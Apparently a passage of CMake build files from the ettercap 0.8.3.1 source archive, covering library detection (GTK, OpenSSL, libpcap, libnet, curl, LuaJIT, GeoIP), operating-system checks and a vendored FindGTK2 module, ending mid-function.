find_package(GTK3 3.12.0) if(GTK3_FOUND) set(HAVE_GTK3 1) else() # give it another try but only in GTK3 compatibility mode find_package(GTK3 REQUIRED) if(GTK3_FOUND) message("\n\ Your version of GTK3 (${GTK3_VERSION}) is not \ sufficient for full GTK3 support.\n\ Full support requires >= 3.12.\n\ Building in GTK3 compatibility mode.\n") set(HAVE_GTK3COMPAT 1) else() message(FATAL_ERROR "You choose to build against GTK3.\ Please install it, or build against GTK1") endif() endif() set(EC_INTERFACES_LIBS ${EC_INTERFACES_LIBS} ${GTK3_LIBRARIES}) set(EC_INCLUDE ${EC_INCLUDE} ${GTK3_INCLUDE_DIRS}) include_directories(${GTK3_INCLUDE_DIRS}) endif() if(GTK_BUILD_TYPE STREQUAL GTK2) find_package(GTK2 2.10 REQUIRED) if(NOT GTK2_FOUND) message(FATAL_ERROR "You choose to build against GTK2, please install it, or build against GTK3") else() message(DEPRECIATION " !!!!!!!!!!!!!!!!!!!!!!!!!!!!") message(DEPRECIATION " ! GTK2 phase-out started !") message(DEPRECIATION " !!!!!!!!!!!!!!!!!!!!!!!!!!!!") message(DEPRECIATION " Please consider building against GTK3.") message(DEPRECIATION " GTK2 support will be dropped in future releases.") endif() set(HAVE_GTK 1) set(EC_INTERFACES_LIBS ${EC_INTERFACES_LIBS} ${GTK2_LIBRARIES}) set(EC_INCLUDE ${EC_INCLUDE} ${GTK2_INCLUDE_DIRS}) include_directories(${GTK2_INCLUDE_DIRS}) endif() if(OS_DARWIN OR OS_BSD) find_library(FOUND_GTHREAD gthread-2.0) if(FOUND_GTHREAD) set(EC_INTERFACES_LIBS ${EC_INTERFACES_LIBS} ${FOUND_GTHREAD}) endif() else() set(EC_INTERFACES_LIBS ${EC_INTERFACES_LIBS} gthread-2.0) endif() endif() find_package(OpenSSL REQUIRED) set(EC_LIBS ${EC_LIBS} ${OPENSSL_LIBRARIES}) set(EC_INCLUDE ${EC_INCLUDE} ${OPENSSL_INCLUDE_DIR}) find_package(ZLIB REQUIRED) set(EC_LIBS ${EC_LIBS} ${ZLIB_LIBRARIES}) set(EC_INCLUDE ${EC_INCLUDE} ${ZLIB_INCLUDE_DIRS}) set(CMAKE_THREAD_PREFER_PTHREAD 1) find_package(Threads REQUIRED) if(CMAKE_USE_PTHREADS_INIT) set(EC_LIBS ${EC_LIBS} ${CMAKE_THREAD_LIBS_INIT}) else() message(FATAL_ERROR "pthreads not found") endif() ## Thats all with packages, now we are on our own :( include(CheckFunctionExists) include(CheckLibraryExists) include(CheckIncludeFile) # Iconv find_library(HAVE_ICONV iconv) check_function_exists(iconv HAVE_UTF8) if(HAVE_ICONV) # Seem that we have a dedicated iconv library not built in libc (e.g. FreeBSD) set(HAVE_UTF8 1) set(EC_LIBS ${EC_LIBS} ${HAVE_ICONV}) else() if(HAVE_UTF8) # iconv built in libc else() message(FATAL_ERROR "iconv not found") endif() endif() # LTDL if(ENABLE_PLUGINS) if(CMAKE_DL_LIBS) # dedicated libdl library set(HAVE_PLUGINS 1) set(EC_LIBS ${EC_LIBS} ${CMAKE_DL_LIBS}) else() # included in libc check_function_exists(dlopen HAVE_DLOPEN) if(HAVE_DLOPEN) set(HAVE_PLUGINS 1) endif() endif() endif() # Fake target for curl add_custom_target(curl) # sslstrip has a requirement for libcurl >= 7.26.0 if(SYSTEM_CURL) message(STATUS "CURL support requested. Will look for curl >= 7.26.0") find_package(CURL 7.26.0) if(NOT CURL_FOUND) message(STATUS "Couldn't find a suitable system-provided version of Curl") endif() endif() if(BUNDLED_CURL AND (NOT CURL_FOUND)) message(STATUS "Using bundled version of Curl") add_subdirectory(bundled_deps/curl) # EXCLUDE_FROM_ALL) add_dependencies(curl bundled_curl) add_dependencies(bundled bundled_curl) endif() # Still haven't found curl? Bail! if(NOT CURL_FOUND) message(STATUS "Could not find Curl, sslstrip and curl support will be disabled!") endif() check_function_exists(poll HAVE_POLL) check_function_exists(strtok_r HAVE_STRTOK_R) check_function_exists(select HAVE_SELECT) check_function_exists(scandir HAVE_SCANDIR) check_function_exists(strlcat HAVE_STRLCAT_FUNCTION) check_function_exists(strlcpy HAVE_STRLCPY_FUNCTION) if(NOT HAVE_STRLCAT_FUNCTION OR NOT HAVE_STRLCPY_FUNCTION) check_library_exists(bsd strlcat "bsd/string.h" HAVE_STRLCAT) check_library_exists(bsd strlcpy "bsd/string.h" HAVE_STRLCPY) if(HAVE_STRLCAT OR HAVE_STRLCPY) set(EC_INTERFACES_LIBS ${EC_INTERFACES_LIBS} bsd) endif() endif() check_function_exists(strsep HAVE_STRSEP) check_function_exists(strcasestr HAVE_STRCASESTR) check_function_exists(memmem HAVE_MEMMEM) check_function_exists(memrchr HAVE_MEMRCHR) check_function_exists(basename HAVE_BASENAME) check_function_exists(strndup HAVE_STRNDUP) find_library(HAVE_PCAP pcap) if(HAVE_PCAP) set(EC_INTERFACES_LIBS ${EC_INTERFACES_LIBS} ${HAVE_PCAP}) else() message(FATAL_ERROR "libpcap not found!") endif() if(ENABLE_GEOIP) message(STATUS "GeoIP support requested. Will look for the legacy GeoIP C library") find_package(GEOIP) if(GEOIP_FOUND) set(HAVE_GEOIP 1) set(EC_LIBS ${EC_LIBS} ${GEOIP_LIBRARIES}) else() message(FATAL_ERROR "GeoIP not found!") endif() endif() # begin LIBNET # This is a fake target that ettercap is dependant upon. If we end up using # a bundled version of libnet, we make this 'libnet' target dependant on it. # That way, everything gets built in the proper order! add_custom_target(libnet) if(SYSTEM_LIBNET) if(ENABLE_IPV6) message(STATUS "IPV6 support requested. Will look for libnet >= 1.1.5") find_package(LIBNET "1.1.5") else() find_package(LIBNET) endif() if(NOT LIBNET_FOUND) message(STATUS "Couldn't find a suitable system-provided version of LIBNET") endif() endif() # Only go into bundled stuff if it's enabled and we haven't found it already. if(BUNDLED_LIBNET AND (NOT LIBNET_FOUND)) message(STATUS "Using bundled version of LIBNET") add_subdirectory(bundled_deps/libnet) # EXCLUDE_FROM_ALL) add_dependencies(libnet bundled_libnet) add_dependencies(bundled bundled_libnet) endif() # Still haven't found libnet? Bail! if(NOT LIBNET_FOUND) message(FATAL_ERROR "Could not find LIBNET!") endif() include_directories(${LIBNET_INCLUDE_DIR}) set(EC_LIBS ${EC_LIBS} ${LIBNET_LIBRARY}) # end LIBNET find_library(HAVE_RESOLV resolv) if(HAVE_RESOLV) set(EC_LIBS ${EC_LIBS} ${HAVE_RESOLV}) set(HAVE_DN_EXPAND 1 CACHE PATH "Found dn_expand") else() if(OS_BSD) # FreeBSD has dn_expand built in libc check_function_exists(dn_expand HAVE_DN_EXPAND) endif() endif() find_package(PCRE) if(PCRE_LIBRARY) set(HAVE_PCRE 1) include_directories(${PCRE_INCLUDE_DIR}) set(EC_LIBS ${EC_LIBS} ${PCRE_LIBRARY}) endif() if(ENABLE_TESTS) if(SYSTEM_LIBCHECK) find_package(LIBCHECK) endif() if(BUNDLED_LIBCHECK AND (NOT LIBCHECK_FOUND)) add_subdirectory(bundled_deps/check) # EXCLUDE_FROM_ALL) else() find_library(LIB_RT rt) if(NOT OS_DARWIN AND (NOT LIB_RT)) message(FATAL_ERROR "Could not find librt, which is required for linking tests.") endif() endif() if(NOT LIBCHECK_FOUND) message(FATAL_ERROR "Could not find LIBCHECK!") endif() endif() ettercap-0.8.3.1/cmake/Modules/EttercapLuajit.cmake000664 000000 000000 00000001357 13711276346 022102 0ustar00rootroot000000 000000 # Sets the variables: # LUAJIT_FOUND # LUAJIT_VERSION # LUAJIT_LIBRARY # LUAJIT_INCLUDE_DIR # # Creates target: # luajit add_custom_target(luajit) if(SYSTEM_LUAJIT) find_package(LUAJIT 2.0.0) if(NOT LUAJIT_FOUND) message(STATUS "Couldn't find a suitable system-provided version of LuaJIT") endif() endif() # Only go into bundled stuff if it's enabled and we haven't found it already. if(BUNDLED_LUAJIT AND (NOT LUAJIT_FOUND)) message(STATUS "Using bundled version of LUAJIT") add_subdirectory(bundled_deps/luajit EXCLUDE_FROM_ALL) add_dependencies(luajit bundled_luajit) add_dependencies(bundled bundled_luajit) endif() if(NOT LUAJIT_FOUND) message(FATAL_ERROR "Could not find LUAJIT!") endif() ettercap-0.8.3.1/cmake/Modules/EttercapOSTest.cmake000664 000000 000000 00000001511 13711276346 022023 0ustar00rootroot000000 000000 if(${CMAKE_SYSTEM_NAME} MATCHES "Linux") set(OS_LINUX 1) elseif(${CMAKE_SYSTEM_NAME} MATCHES "FreeBSD") set(OS_BSD 1) set(OS_BSD_FREE 1) elseif(${CMAKE_SYSTEM_NAME} MATCHES "NetBSD") set(OS_BSD 1) set(OS_BSD_NET 1) elseif(${CMAKE_SYSTEM_NAME} MATCHES "OpenBSD") set(OS_BSD 1) set(OS_BSD_OPEN 1) elseif(${CMAKE_SYSTEM_NAME} MATCHES "Darwin") set(OS_DARWIN 1) elseif(${CMAKE_SYSTEM_NAME} MATCHES "SunOS") set(OS_SOLARIS 1) elseif(${CMAKE_SYSTEM_NAME} MATCHES "GNU") set(OS_GNU 1) elseif(MINGW) set(OS_MINGW 1) set(OS_WINDOWS 1) elseif(CYGWIN) set(OS_CYGWIN 1) set(OS_WINDOWS 1) else() message(FATAL_ERROR "Operating system not supported") endif() set(OS_SIZEOF_P ${CMAKE_SIZEOF_VOID_P}) include(TestBigEndian) test_big_endian(WORDS_BIGENDIAN) set(CC_VERSION ${CMAKE_C_COMPILER}) ettercap-0.8.3.1/cmake/Modules/EttercapVariableCheck.cmake000664 000000 000000 00000000673 13711276346 023335 0ustar00rootroot000000 000000 # Check if PTHREAD_MUTEX_RECURSIVE_NP exists check_variable_in_headers(PTHREAD_MUTEX_RECURSIVE_NP "pthread.h" HAVE_MUTEX_RECURSIVE_NP) # Check if IP6T_SO_ORIGINAL_DST socket option is available - necessary for IPv6 SSL interception if(OS_LINUX AND ENABLE_IPV6) include(CheckSymbolExists) check_symbol_exists( IP6T_SO_ORIGINAL_DST "net/if.h;netinet/in.h;linux/netfilter_ipv6/ip6_tables.h" HAVE_IP6T_SO_ORIGINAL_DST ) endif() ettercap-0.8.3.1/cmake/Modules/FindCURL.cmake000664 000000 000000 00000005006 13711276346 020523 0ustar00rootroot000000 000000 # Copyright 2013 Ettercap Development Team. # # Distributed under GPL licnse. # # Look for the header file find_path(CURL_INCLUDE_DIR NAMES curl/curl.h) mark_as_advanced(CURL_INCLUDE_DIR) # Look for the library. find_library(CURL_LIBRARY NAMES curl # Windows MSVC prebuilts: curllib libcurl_imp curllib_static ) mark_as_advanced(CURL_LIBRARY) # Make sure we've got an include dir. if(NOT CURL_INCLUDE_DIR) if(CURL_FIND_REQUIRED AND NOT CURL_FIND_QUIETLY) message(FATAL_ERROR "Could not find CURL include directory.") endif() return() endif() if(NOT CURL_LIBRARY) if(CURL_FIND_REQUIRED AND NOT CURL_FIND_QUIETLY) message(FATAL_ERROR "Could not find CURL library.") endif() return() endif() if(CURL_FIND_VERSION) # Try to find the version number. foreach(_curl_version_header curlver.h curl.h) if(EXISTS "${CURL_INCLUDE_DIR}/curl/${_curl_version_header}") file(STRINGS "${CURL_INCLUDE_DIR}/curl/${_curl_version_header}" curl_version_str REGEX "^#define[\t ]+LIBCURL_VERSION[\t ]+\".*\"") string(REGEX REPLACE "^#define[\t ]+LIBCURL_VERSION[\t ]+\"([^\"]*)\".*" "\\1" CURL_VERSION_STRING "${curl_version_str}") unset(curl_version_str) break() endif() endforeach() set(CURL_FAILED_VERSION_CHECK true) if(CURL_FIND_VERSION_EXACT) if(CURL_VERSION_STRING VERSION_EQUAL CURL_FIND_VERSION) set(CURL_FAILED_VERSION_CHECK false) endif() else() if(CURL_VERSION_STRING VERSION_EQUAL CURL_FIND_VERSION OR CURL_VERSION_STRING VERSION_GREATER CURL_FIND_VERSION) set(CURL_FAILED_VERSION_CHECK false) endif() endif() if(CURL_FAILED_VERSION_CHECK) if(CURL_FIND_REQUIRED AND NOT CURL_FIND_QUIETLY) if(CURL_FIND_VERSION_EXACT) message(FATAL_ERROR "CURL version check failed. Version ${CURL_VERSION_STRING} was found, version ${CURL_FIND_VERSION} is needed exactly.") else() message(FATAL_ERROR "CURL version check failed. Version ${CURL_VERSION_STRING} was found, at least version ${CURL_FIND_VERSION} is required") endif() endif() # If the version check fails, exit out of the module here return() endif() endif() #handle the QUIETLY and REQUIRED arguments and set CURL_FOUND to TRUE if # all listed variables are TRUE include(FindPackageHandleStandardArgs) find_package_handle_standard_args(CURL DEFAULT_MSG CURL_LIBRARY CURL_INCLUDE_DIR) if(CURL_FOUND) set(CURL_LIBRARY ${CURL_LIBRARY}) set(CURL_INCLUDE_DIR ${CURL_INCLUDE_DIR}) set(CURL_VERSION_STRING ${CURL_VERSION_STRING}) endif() ettercap-0.8.3.1/cmake/Modules/FindGEOIP.cmake000664 000000 000000 00000002455 13711276346 020626 0ustar00rootroot000000 000000 # # - Find GeoIP # Find the native GeoIP includes and library # # GEOIP_INCLUDE_DIRS - where to find GeoIP.h, etc. # GEOIP_LIBRARIES - List of libraries when using GeoIP. # GEOIP_FOUND - True if GeoIP found. if(GEOIP_INCLUDE_DIRS) # Already in cache, be silent set(GEOIP_FIND_QUIETLY TRUE) endif() # Users may set the (environment) variable GEOIP_ROOT # to point cmake to the *root* of a directory with include # and lib subdirectories for GeoIP if(GEOIP_ROOT) set(GEOIP_ROOT PATHS ${GEOIP_ROOT} NO_DEFAULT_PATH) else() set(GEOIP_ROOT $ENV{GEOIP_ROOT}) endif() find_package(PkgConfig) pkg_search_module(GEOIP geoip) # Find the header find_path(GEOIP_INCLUDE_DIR GeoIP.h HINTS "${GEOIP_INCLUDEDIR}" "${GEOIP_ROOT}" PATH_SUFFIXES include Include ) # Find the library find_library(GEOIP_LIBRARY NAMES GeoIP libGeoIP-1 HINTS "${GEOIP_LIBDIR}" "${GEOIP_ROOT}" PATH_SUFFIXES lib ) # handle the QUIETLY and REQUIRED arguments and set GEOIP_FOUND to TRUE if # all listed variables are TRUE include(FindPackageHandleStandardArgs) find_package_handle_standard_args(GEOIP DEFAULT_MSG GEOIP_LIBRARY GEOIP_INCLUDE_DIR) if(GEOIP_FOUND) set(GEOIP_LIBRARIES ${GEOIP_LIBRARY}) set(GEOIP_INCLUDE_DIRS ${GEOIP_INCLUDE_DIR}) endif() mark_as_advanced(GEOIP_LIBRARIES GEOIP_INCLUDE_DIRS) ettercap-0.8.3.1/cmake/Modules/FindGTK2.cmake000664 000000 000000 00000105571 13711276346 020475 0ustar00rootroot000000 000000 # Distributed under the OSI-approved BSD 3-Clause License. See accompanying # file Copyright.txt or https://cmake.org/licensing for details. #[=======================================================================[.rst: FindGTK2 -------- Find the GTK2 widget libraries and several of its other optional components like ``gtkmm``, ``glade``, and ``glademm``. NOTE: If you intend to use version checking, CMake 2.6.2 or later is :: required. Specify one or more of the following components as you call this find module. See example below. :: gtk gtkmm glade glademm The following variables will be defined for your use :: GTK2_FOUND - Were all of your specified components found? GTK2_INCLUDE_DIRS - All include directories GTK2_LIBRARIES - All libraries GTK2_TARGETS - All imported targets GTK2_DEFINITIONS - Additional compiler flags :: GTK2_VERSION - The version of GTK2 found (x.y.z) GTK2_MAJOR_VERSION - The major version of GTK2 GTK2_MINOR_VERSION - The minor version of GTK2 GTK2_PATCH_VERSION - The patch version of GTK2 Optional variables you can define prior to calling this module: :: GTK2_DEBUG - Enables verbose debugging of the module GTK2_ADDITIONAL_SUFFIXES - Allows defining additional directories to search for include files ================= Example Usage: :: Call find_package() once, here are some examples to pick from: :: Require GTK 2.6 or later find_package(GTK2 2.6 REQUIRED gtk) :: Require GTK 2.10 or later and Glade find_package(GTK2 2.10 REQUIRED gtk glade) :: Search for GTK/GTKMM 2.8 or later find_package(GTK2 2.8 COMPONENTS gtk gtkmm) :: if(GTK2_FOUND) include_directories(${GTK2_INCLUDE_DIRS}) add_executable(mygui mygui.cc) target_link_libraries(mygui ${GTK2_LIBRARIES}) endif() #]=======================================================================] # Version 1.6 (CMake 3.0) # * Create targets for each library # * Do not link libfreetype # Version 1.5 (CMake 2.8.12) # * 14236: Detect gthread library # Detect pangocairo on windows # Detect pangocairo with gtk module instead of with gtkmm # * 14259: Use vc100 libraries with VS 11 # * 14260: Export a GTK2_DEFINITIONS variable to set /vd2 when appropriate # (i.e. MSVC) # * Use the optimized/debug syntax for _LIBRARY and _LIBRARIES variables when # appropriate. A new set of _RELEASE variables was also added. # * Remove GTK2_SKIP_MARK_AS_ADVANCED option, as now the variables are # marked as advanced by SelectLibraryConfigurations # * Detect gmodule, pangoft2 and pangoxft libraries # Version 1.4 (10/4/2012) (CMake 2.8.10) # * 12596: Missing paths for FindGTK2 on NetBSD # * 12049: Fixed detection of GTK include files in the lib folder on # multiarch systems. # Version 1.3 (11/9/2010) (CMake 2.8.4) # * 11429: Add support for detecting GTK2 built with Visual Studio 10. # Thanks to Vincent Levesque for the patch. # Version 1.2 (8/30/2010) (CMake 2.8.3) # * Merge patch for detecting gdk-pixbuf library (split off # from core GTK in 2.21). Thanks to Vincent Untz for the patch # and Ricardo Cruz for the heads up. # Version 1.1 (8/19/2010) (CMake 2.8.3) # * Add support for detecting GTK2 under macports (thanks to Gary Kramlich) # Version 1.0 (8/12/2010) (CMake 2.8.3) # * Add support for detecting new pangommconfig.h header file # (Thanks to Sune Vuorela & the Debian Project for the patch) # * Add support for detecting fontconfig.h header # * Call find_package(Freetype) since it's required # * Add support for allowing users to add additional library directories # via the GTK2_ADDITIONAL_SUFFIXES variable (kind of a future-kludge in # case the GTK developers change versions on any of the directories in the # future). # Version 0.8 (1/4/2010) # * Get module working under MacOSX fink by adding /sw/include, /sw/lib # to PATHS and the gobject library # Version 0.7 (3/22/09) # * Checked into CMake CVS # * Added versioning support # * Module now defaults to searching for GTK if COMPONENTS not specified. # * Added HKCU prior to HKLM registry key and GTKMM specific environment # variable as per mailing list discussion. # * Added lib64 to include search path and a few other search paths where GTK # may be installed on Unix systems. # * Switched to lowercase CMake commands # * Prefaced internal variables with _GTK2 to prevent collision # * Changed internal macros to functions # * Enhanced documentation # Version 0.6 (1/8/08) # Added GTK2_SKIP_MARK_AS_ADVANCED option # Version 0.5 (12/19/08) # Second release to cmake mailing list #============================================================= # _GTK2_GET_VERSION # Internal function to parse the version number in gtkversion.h # _OUT_major = Major version number # _OUT_minor = Minor version number # _OUT_micro = Micro version number # _gtkversion_hdr = Header file to parse #============================================================= include(${CMAKE_CURRENT_LIST_DIR}/SelectLibraryConfigurations.cmake) function(_GTK2_GET_VERSION _OUT_major _OUT_minor _OUT_micro _gtkversion_hdr) file(STRINGS ${_gtkversion_hdr} _contents REGEX "#define GTK_M[A-Z]+_VERSION[ \t]+") if(_contents) string(REGEX REPLACE ".*#define GTK_MAJOR_VERSION[ \t]+\\(([0-9]+)\\).*" "\\1" ${_OUT_major} "${_contents}") string(REGEX REPLACE ".*#define GTK_MINOR_VERSION[ \t]+\\(([0-9]+)\\).*" "\\1" ${_OUT_minor} "${_contents}") string(REGEX REPLACE ".*#define GTK_MICRO_VERSION[ \t]+\\(([0-9]+)\\).*" "\\1" ${_OUT_micro} "${_contents}") if(NOT ${_OUT_major} MATCHES "[0-9]+") message(FATAL_ERROR "Version parsing failed for GTK2_MAJOR_VERSION!") endif() if(NOT ${_OUT_minor} MATCHES "[0-9]+") message(FATAL_ERROR "Version parsing failed for GTK2_MINOR_VERSION!") endif() if(NOT ${_OUT_micro} MATCHES "[0-9]+") message(FATAL_ERROR "Version parsing failed for GTK2_MICRO_VERSION!") endif() set(${_OUT_major} ${${_OUT_major}} PARENT_SCOPE) set(${_OUT_minor} ${${_OUT_minor}} PARENT_SCOPE) set(${_OUT_micro} ${${_OUT_micro}} PARENT_SCOPE) else() message(FATAL_ERROR "Include file ${_gtkversion_hdr} does not exist") endif() endfunction() #============================================================= # _GTK2_SIGCXX_GET_VERSION # Internal function to parse the version number in # sigc++config.h # _OUT_major = Major version number # _OUT_minor = Minor version number # _OUT_micro = Micro version number # _sigcxxversion_hdr = Header file to parse #============================================================= function(_GTK2_SIGCXX_GET_VERSION _OUT_major _OUT_minor _OUT_micro _sigcxxversion_hdr) file(STRINGS ${_sigcxxversion_hdr} _contents REGEX "#define SIGCXX_M[A-Z]+_VERSION[ \t]+") if(_contents) string(REGEX REPLACE ".*#define SIGCXX_MAJOR_VERSION[ \t]+([0-9]+).*" "\\1" ${_OUT_major} "${_contents}") string(REGEX REPLACE ".*#define SIGCXX_MINOR_VERSION[ \t]+([0-9]+).*" "\\1" ${_OUT_minor} "${_contents}") string(REGEX REPLACE ".*#define SIGCXX_MICRO_VERSION[ \t]+([0-9]+).*" "\\1" ${_OUT_micro} "${_contents}") if(NOT ${_OUT_major} MATCHES "[0-9]+") message(FATAL_ERROR "Version parsing failed for SIGCXX_MAJOR_VERSION!") endif() if(NOT ${_OUT_minor} MATCHES "[0-9]+") message(FATAL_ERROR "Version parsing failed for SIGCXX_MINOR_VERSION!") endif() if(NOT ${_OUT_micro} MATCHES "[0-9]+") message(FATAL_ERROR "Version parsing failed for SIGCXX_MICRO_VERSION!") endif() set(${_OUT_major} ${${_OUT_major}} PARENT_SCOPE) set(${_OUT_minor} ${${_OUT_minor}} PARENT_SCOPE) set(${_OUT_micro} ${${_OUT_micro}} PARENT_SCOPE) else() # The header does not have the version macros; assume it is ``0.0.0``. set(${_OUT_major} 0) set(${_OUT_minor} 0) set(${_OUT_micro} 0) endif() endfunction() #============================================================= # _gtk2_find_include_dir # Internal function to find the GTK include directories # _var = variable to set (_INCLUDE_DIR is appended) # _hdr = header file to look for #============================================================= function(_gtk2_find_include_dir _var _hdr) if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "_gtk2_find_include_dir( ${_var} ${_hdr} )") endif() set(_gtk_packages # If these ever change, things will break. ${GTK2_ADDITIONAL_SUFFIXES} glibmm-2.4 glib-2.0 atk-1.0 atkmm-1.6 cairo cairomm-1.0 gdk-pixbuf-2.0 gdkmm-2.4 giomm-2.4 gtk-2.0 gtkmm-2.4 libglade-2.0 libglademm-2.4 harfbuzz pango-1.0 pangomm-1.4 sigc++-2.0 ) # # NOTE: The following suffixes cause searching for header files in both of # these directories: # /usr/include/ # /usr/lib//include # set(_suffixes) foreach(_d ${_gtk_packages}) list(APPEND _suffixes ${_d}) list(APPEND _suffixes ${_d}/include) # for /usr/lib/gtk-2.0/include endforeach() if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "include suffixes = ${_suffixes}") endif() if(CMAKE_LIBRARY_ARCHITECTURE) set(_gtk2_arch_dir /usr/lib/${CMAKE_LIBRARY_ARCHITECTURE}) if(GTK2_DEBUG) message(STATUS "Adding ${_gtk2_arch_dir} to search path for multiarch support") endif() endif() find_path(GTK2_${_var}_INCLUDE_DIR ${_hdr} PATHS ${_gtk2_arch_dir} /usr/local/libx32 /usr/local/lib64 /usr/local/lib /usr/libx32 /usr/lib64 /usr/lib /opt/gnome/include /opt/gnome/lib /opt/openwin/include /usr/openwin/lib /sw/lib /opt/local/lib /usr/pkg/lib /usr/pkg/include/glib $ENV{GTKMM_BASEPATH}/include $ENV{GTKMM_BASEPATH}/lib [HKEY_CURRENT_USER\\SOFTWARE\\gtkmm\\2.4;Path]/include [HKEY_CURRENT_USER\\SOFTWARE\\gtkmm\\2.4;Path]/lib [HKEY_LOCAL_MACHINE\\SOFTWARE\\gtkmm\\2.4;Path]/include [HKEY_LOCAL_MACHINE\\SOFTWARE\\gtkmm\\2.4;Path]/lib PATH_SUFFIXES ${_suffixes} ) mark_as_advanced(GTK2_${_var}_INCLUDE_DIR) if(GTK2_${_var}_INCLUDE_DIR) set(GTK2_INCLUDE_DIRS ${GTK2_INCLUDE_DIRS} ${GTK2_${_var}_INCLUDE_DIR} PARENT_SCOPE) endif() endfunction() #============================================================= # _gtk2_find_library # Internal function to find libraries packaged with GTK2 # _var = library variable to create (_LIBRARY is appended) #============================================================= function(_gtk2_find_library _var _lib _expand_vc _append_version) if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "_gtk2_find_library( ${_var} ${_lib} ${_expand_vc} ${_append_version} )") endif() # Not GTK versions per se but the versions encoded into Windows # import libraries (GtkMM 2.14.1 has a gtkmm-vc80-2_4.lib for example) # Also the MSVC libraries use _ for . (this is handled below) set(_versions 2.20 2.18 2.16 2.14 2.12 2.10 2.8 2.6 2.4 2.2 2.0 1.20 1.18 1.16 1.14 1.12 1.10 1.8 1.6 1.4 1.2 1.0) set(_library) set(_library_d) set(_library ${_lib}) if(_expand_vc AND MSVC) # Add vc80/vc90/vc100 midfixes if(MSVC_TOOLSET_VERSION LESS 110) set(_library ${_library}-vc${MSVC_TOOLSET_VERSION}) else() # Up to gtkmm-win 2.22.0-2 there are no vc110 libraries but vc100 can be used set(_library ${_library}-vc100) endif() set(_library_d ${_library}-d) endif() if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "After midfix addition = ${_library} and ${_library_d}") endif() set(_lib_list) set(_libd_list) if(_append_version) foreach(_ver ${_versions}) list(APPEND _lib_list "${_library}-${_ver}") list(APPEND _libd_list "${_library_d}-${_ver}") endforeach() else() set(_lib_list ${_library}) set(_libd_list ${_library_d}) endif() if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "library list = ${_lib_list} and library debug list = ${_libd_list}") endif() # For some silly reason the MSVC libraries use _ instead of . # in the version fields if(_expand_vc AND MSVC) set(_no_dots_lib_list) set(_no_dots_libd_list) foreach(_l ${_lib_list}) string(REPLACE "." "_" _no_dots_library ${_l}) list(APPEND _no_dots_lib_list ${_no_dots_library}) endforeach() # And for debug set(_no_dots_libsd_list) foreach(_l ${_libd_list}) string(REPLACE "." "_" _no_dots_libraryd ${_l}) list(APPEND _no_dots_libd_list ${_no_dots_libraryd}) endforeach() # Copy list back to original names set(_lib_list ${_no_dots_lib_list}) set(_libd_list ${_no_dots_libd_list}) endif() if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "While searching for GTK2_${_var}_LIBRARY, our proposed library list is ${_lib_list}") endif() find_library(GTK2_${_var}_LIBRARY_RELEASE NAMES ${_lib_list} PATHS /opt/gnome/lib /usr/openwin/lib $ENV{GTKMM_BASEPATH}/lib [HKEY_CURRENT_USER\\SOFTWARE\\gtkmm\\2.4;Path]/lib [HKEY_LOCAL_MACHINE\\SOFTWARE\\gtkmm\\2.4;Path]/lib ) if(_expand_vc AND MSVC) if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "While searching for GTK2_${_var}_LIBRARY_DEBUG our proposed library list is ${_libd_list}") endif() find_library(GTK2_${_var}_LIBRARY_DEBUG NAMES ${_libd_list} PATHS $ENV{GTKMM_BASEPATH}/lib [HKEY_CURRENT_USER\\SOFTWARE\\gtkmm\\2.4;Path]/lib [HKEY_LOCAL_MACHINE\\SOFTWARE\\gtkmm\\2.4;Path]/lib ) endif() select_library_configurations(GTK2_${_var}) set(GTK2_${_var}_LIBRARY ${GTK2_${_var}_LIBRARY} PARENT_SCOPE) set(GTK2_${_var}_FOUND ${GTK2_${_var}_FOUND} PARENT_SCOPE) if(GTK2_${_var}_FOUND) set(GTK2_LIBRARIES ${GTK2_LIBRARIES} ${GTK2_${_var}_LIBRARY}) set(GTK2_LIBRARIES ${GTK2_LIBRARIES} PARENT_SCOPE) endif() if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "GTK2_${_var}_LIBRARY_RELEASE = \"${GTK2_${_var}_LIBRARY_RELEASE}\"") message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "GTK2_${_var}_LIBRARY_DEBUG = \"${GTK2_${_var}_LIBRARY_DEBUG}\"") message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "GTK2_${_var}_LIBRARY = \"${GTK2_${_var}_LIBRARY}\"") message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "GTK2_${_var}_FOUND = \"${GTK2_${_var}_FOUND}\"") endif() endfunction() function(_gtk2_add_target_DEPENDS_INTERNAL _var _property) if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "_gtk2_add_target_DEPENDS_INTERNAL( ${_var} ${_property} )") endif() string(TOLOWER "${_var}" _basename) if(TARGET GTK2::${_basename}) foreach(_depend ${ARGN}) set(_valid_depends) if(TARGET GTK2::${_depend}) list(APPEND _valid_depends GTK2::${_depend}) endif() if(_valid_depends) set_property(TARGET GTK2::${_basename} APPEND PROPERTY ${_property} "${_valid_depends}") endif() set(_valid_depends) endforeach() endif() endfunction() function(_gtk2_add_target_DEPENDS _var) if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "_gtk2_add_target_DEPENDS( ${_var} )") endif() string(TOLOWER "${_var}" _basename) if(TARGET GTK2::${_basename}) get_target_property(_configs GTK2::${_basename} IMPORTED_CONFIGURATIONS) _gtk2_add_target_depends_internal(${_var} INTERFACE_LINK_LIBRARIES ${ARGN}) foreach(_config ${_configs}) _gtk2_add_target_depends_internal(${_var} IMPORTED_LINK_INTERFACE_LIBRARIES_${_config} ${ARGN}) endforeach() endif() endfunction() function(_gtk2_add_target_INCLUDE_DIRS _var) if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "_gtk2_add_target_INCLUDE_DIRS( 